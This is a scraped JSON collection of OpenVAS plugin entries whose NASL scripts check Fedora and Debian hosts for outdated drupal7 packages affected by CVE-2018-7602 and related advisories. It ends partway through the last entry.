Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure.
{"openvas": [{"lastseen": "2019-05-29T18:32:14", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-82df33e428", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875498", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875498\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2019-03-07 04:16:17 +0100 (Thu, 07 Mar 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-82df33e428\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-82df33e428\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NSOCWBFM4P67FW6Q7VWMJUVBGDWNNURQ\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal7' package(s) announced via the FEDORA-2019-82df33e428 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.64~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-12-04T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-18023f40fa", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602", "CVE-2012-2922"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875344", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875344", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_18023f40fa_drupal7_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-18023f40fa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875344\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:38:57 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-18023f40fa\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-18023f40fa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EV4RZIREFWKABPNE6QLBRMUZOKCTPEP7\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2018-18023f40fa advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", 
value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.60~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:12", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-04-03T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-2fbce03df3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602", "CVE-2019-6341", "CVE-2012-2922"], "modified": "2019-04-03T00:00:00", "id": "OPENVAS:1361412562310875532", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875532", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875532\");\n script_version(\"2019-04-03T06:51:48+0000\");\n script_cve_id(\"CVE-2012-2922\", \"CVE-2018-7602\", \"CVE-2019-6341\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-04-03 06:51:48 +0000 (Wed, 03 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-03 06:51:48 +0000 (Wed, 03 Apr 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-2fbce03df3\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-2fbce03df3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Y4SVTVIJ33XCFQ6X6XTVMQM3NPLP2WFS\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-2fbce03df3 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. 
Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.65~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:17", "description": "The remote host is missing an update for the\n ", "cvss3": {}, "published": "2019-05-09T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-f563e66380", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7602", "CVE-2012-2922"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876331", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876331", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A 
PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876331\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2019-11358\", \"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-09 02:13:20 +0000 (Thu, 09 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-f563e66380\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-f563e66380\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'drupal7' package(s) announced via the FEDORA-2019-f563e66380 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features,\n Drupal is a Content Management System written in PHP that can support a variety\n of websites ranging from personal weblogs to large community-driven websites.\n Drupal is highly configurable, skinnable, and 
secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.66~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-05T01:40:47", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-26T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2019-41d6ffd6f0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11358", "CVE-2018-7602", "CVE-2019-11831", "CVE-2012-2922"], "modified": "2019-05-31T00:00:00", "id": "OPENVAS:1361412562310876417", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876417", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876417\");\n script_version(\"2019-05-31T13:18:49+0000\");\n script_cve_id(\"CVE-2019-11831\", \"CVE-2019-11358\", \"CVE-2012-2922\", \"CVE-2018-7602\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-31 13:18:49 +0000 (Fri, 31 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-26 02:12:18 +0000 (Sun, 26 May 2019)\");\n script_name(\"Fedora Update for drupal7 FEDORA-2019-41d6ffd6f0\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-41d6ffd6f0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Z246UWBXBEKTQUDTLRJTC7XYBIO4IBE4\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the FEDORA-2019-41d6ffd6f0 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Equipped with a powerful blend of features, Drupal is a Content Management\nSystem written in PHP that can support a variety of websites ranging from\npersonal weblogs to large community-driven websites. 
Drupal is highly\nconfigurable, skinnable, and secure.\");\n\n script_tag(name:\"affected\", value:\"'drupal7' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.67~1.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:09:10", "description": "A remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.", "cvss3": {}, "published": "2018-04-27T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for drupal7 (DLA-1365-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891365", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891365", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891365\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2018-7602\");\n script_name(\"Debian LTS: Security Advisory for drupal7 (DLA-1365-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-04-27 00:00:00 +0200 (Fri, 27 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/04/msg00030.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n7.14-2+deb7u19.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_tag(name:\"summary\", value:\"remote code execution vulnerability has been found within multiple\nsubsystems of Drupal. 
This potentially allows attackers to exploit\nmultiple attack vectors on a Drupal site, which could result in the\nsite being compromised.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u19\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-04T18:55:43", "description": "A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.", "cvss3": {}, "published": "2018-04-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4180-1 (drupal7 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7602"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704180", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4180-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without 
even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704180\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-7602\");\n script_name(\"Debian Security Advisory DSA 4180-1 (drupal7 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 00:00:00 +0200 (Wed, 25 Apr 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4180.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB[89]\");\n script_tag(name:\"affected\", value:\"drupal7 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 7.32-1+deb8u12.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 7.52-2+deb9u4.\n\nWe recommend that you upgrade your drupal7 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/drupal7\");\n 
script_tag(name:\"summary\", value:\"A remote code execution vulnerability has been found in Drupal, a\nfully-featured content management framework.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.32-1+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.52-2+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:52:08", "description": "Check for the Version of drupal7", "cvss3": {}, "published": "2013-03-08T00:00:00", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2013-2872", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2922"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:865431", "href": "http://plugins.openvas.org/nasl.php?oid=865431", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for drupal7 FEDORA-2013-2872\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"drupal7 on Fedora 17\";\ntag_insight = \"Equipped with a powerful blend of features, Drupal is a Content Management\n System written in PHP that can support a variety of websites ranging from\n personal weblogs to large community-driven websites. Drupal is highly\n configurable, skinnable, and secure.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/099673.html\");\n script_id(865431);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-08 10:16:43 +0530 (Fri, 08 Mar 2013)\");\n script_cve_id(\"CVE-2012-2922\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2013-2872\");\n script_name(\"Fedora Update for drupal7 FEDORA-2013-2872\");\n\n script_summary(\"Check for the Version of drupal7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n 
